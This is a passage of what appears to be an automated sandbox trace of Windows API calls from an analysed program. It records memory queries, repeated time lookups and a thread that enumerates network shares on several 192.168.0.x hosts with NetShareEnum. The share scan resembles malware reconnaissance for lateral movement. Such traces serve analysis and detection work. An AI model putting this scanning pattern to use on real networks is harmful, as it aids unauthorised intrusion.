lpBuffer=0x19fb88, dwLength=0x1c | out: lpBuffer=0x19fb88*(BaseAddress=0x4ec000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x1000000)) returned 0x1c [0260.843] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x4f0000, lpBuffer=0x19fb88, dwLength=0x1c | out: lpBuffer=0x19fb88*(BaseAddress=0x4f0000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x8, Type=0x1000000)) returned 0x1c [0260.843] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x4f1000, lpBuffer=0x19fb88, dwLength=0x1c | out: lpBuffer=0x19fb88*(BaseAddress=0x4f1000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x1000000)) returned 0x1c [0260.843] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x4f2000, lpBuffer=0x19fb88, dwLength=0x1c | out: lpBuffer=0x19fb88*(BaseAddress=0x4f2000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0260.843] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x4f3000, lpBuffer=0x19fb88, dwLength=0x1c | out: lpBuffer=0x19fb88*(BaseAddress=0x4f3000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x1000000)) returned 0x1c [0260.843] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x4f4000, lpBuffer=0x19fb88, dwLength=0x1c | out: lpBuffer=0x19fb88*(BaseAddress=0x4f4000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x4b000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0260.843] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x53f000, lpBuffer=0x19fb88, dwLength=0x1c | out: lpBuffer=0x19fb88*(BaseAddress=0x53f000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x1000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0260.843] GetCurrentThreadId () returned 0x3ac [0260.843] GetCurrentThreadId () returned 0x3ac [0260.843] ResetEvent (hEvent=0x1e0) returned 1 [0260.843] GetCurrentThreadId () returned 0x3ac [0260.843] GetCurrentThreadId () returned 0x3ac [0260.843] GetCurrentThreadId () returned 0x3ac [0260.843] ResetEvent (hEvent=0x1e0) returned 1 [0260.843] GetCurrentThreadId () returned 0x3ac [0260.843] GetCurrentThreadId () returned 0x3ac [0260.843] GetCurrentThreadId () returned 0x3ac [0260.843] GetCurrentThreadId () returned 0x3ac [0260.843] GetCurrentThreadId () returned 0x3ac [0260.843] GetCurrentThreadId () returned 0x3ac [0260.843] GetCurrentThreadId () returned 0x3ac [0260.843] GetCurrentThreadId () returned 0x3ac [0260.843] GetCurrentThreadId () returned 0x3ac [0260.843] GetCurrentThreadId () returned 0x3ac [0260.843] GetCurrentThreadId () returned 0x3ac [0260.843] GetCurrentThreadId () returned 0x3ac [0260.843] GetCurrentThreadId () returned 0x3ac [0260.843] CloseHandle (hObject=0x1e0) returned 1 [0260.843] CloseHandle (hObject=0x1e4) returned 1 [0260.843] CloseHandle (hObject=0x1dc) returned 1 [0260.844] GetCurrentThreadId () returned 0x3ac [0260.844] GetCurrentThreadId () returned 0x3ac [0260.844] GetCurrentThreadId () returned 0x3ac [0260.844] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.844] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.844] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.844] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.844] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.844] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.844] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.844] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.844] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.844] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.844] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.844] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.844] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.844] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.844] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.844] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.844] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.844] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.844] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.844] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.844] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.844] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.844] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.845] GetLocalTime (in: lpSystemTime=0x19fbcc | out: lpSystemTime=0x19fbcc*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x7, wSecond=0x39, wMilliseconds=0x1da)) [0260.846] VirtualFree (lpAddress=0x1da0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0260.847] FreeLibrary (hLibModule=0x75130000) returned 1 [0260.847] LocalFree (hMem=0x2252c8) returned 0x0 [0260.847] ExitProcess (uExitCode=0x0) Thread: id = 20 os_tid = 0xb04 Thread: id = 21 os_tid = 0x93c [0088.043] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.4", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0088.043] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.4", cchWideChar=13, lpMultiByteStr=0x1e82f0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.4", lpUsedDefaultChar=0x0) returned 13 [0088.043] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x235ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.043] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.043] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.043] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x235ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.043] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.043] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.043] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x235fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x235fc54*=0xf, lpOverlapped=0x0) returned 1 [0088.088] NetShareEnum (in: servername="\\\\192.168.0.4", level=0x1, bufptr=0x235fedc, prefmaxlen=0xffffffff, entriesread=0x235fed4, totalentries=0x235fed0, resume_handle=0x235fecc | out: bufptr=0x235fedc, entriesread=0x235fed4, totalentries=0x235fed0, resume_handle=0x235fecc) returned 0x35 [0132.957] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.71", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0132.957] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.71", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.71", lpUsedDefaultChar=0x0) returned 14 [0132.957] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x235ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0132.957] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0132.957] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0132.957] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x235ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0132.957] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0132.957] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0132.957] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x235fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x235fc54*=0x10, lpOverlapped=0x0) returned 1 [0132.961] NetShareEnum (in: servername="\\\\192.168.0.71", level=0x1, bufptr=0x235fedc, prefmaxlen=0xffffffff, entriesread=0x235fed4, totalentries=0x235fed0, resume_handle=0x235fecc | out: bufptr=0x235fedc, entriesread=0x235fed4, totalentries=0x235fed0, resume_handle=0x235fecc) returned 0x35 [0167.749] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.130", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0167.749] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.130", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.130", lpUsedDefaultChar=0x0) returned 15 [0167.749] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x235ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0167.749] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0167.749] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0167.750] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x235ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0167.750] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0167.750] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0167.750] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x235fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x235fc54*=0x11, lpOverlapped=0x0) returned 1 [0167.755] NetShareEnum (in: servername="\\\\192.168.0.130", level=0x1, bufptr=0x235fedc, prefmaxlen=0xffffffff, entriesread=0x235fed4, totalentries=0x235fed0, resume_handle=0x235fecc | out: bufptr=0x235fedc, entriesread=0x235fed4, totalentries=0x235fed0, resume_handle=0x235fecc) returned 0x35 [0201.576] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.194", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0201.576] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, 